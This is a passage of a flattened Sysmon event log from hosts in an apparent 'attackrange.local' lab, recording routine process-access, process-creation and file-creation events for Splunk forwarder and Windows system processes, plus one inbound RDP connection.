Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807240Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.763{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F442-60EB-6979-00000000D001}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807239Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:26.763{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807238Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.763{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807237Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:26.763{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807236Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.763{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807235Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:26.763{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807234Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.763{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807233Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:26.763{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807232Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.747{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807231Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:26.747{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807230Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.747{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F442-60EB-6979-00000000D001}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807229Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.747{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F442-60EB-6979-00000000D001}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807228Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.748{0C1E0330-F442-60EB-6979-00000000D001}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807227Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.700{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7F4B8F306CC2AE2A001E9C17F27FA04,SHA256=AD01F00528E151F34263EDB9385F3D3FE1C76DA5C1F8C6E77A63215804EE3A10,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001048005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:26.135{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94467A0D27E4487FC05EC0EDDD3987B6,SHA256=33BF2649487F413EADFD871DBA5EBB4FDD92E98A1F9D99E12DD0BB5C5BECE0E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807226Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.419{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D43C138D22B9EC33AE6854270108BBB,SHA256=D53498324C1AAFB740B193B4254CAEEFAA8A402BC3D1C95D73A180DEB3A5B87E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807225Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.291{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse122.226.223.195-50692-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 10341000x8000000000000000807224Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.091{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F442-60EB-6879-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807223Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:26.091{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807222Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.091{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807221Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:26.091{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807220Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.075{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807219Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:26.075{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807218Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.075{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807217Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:26.075{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807216Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.075{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807215Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:26.075{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807214Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.075{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F442-60EB-6879-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807213Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.075{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F442-60EB-6879-00000000D001}3952C:\Program 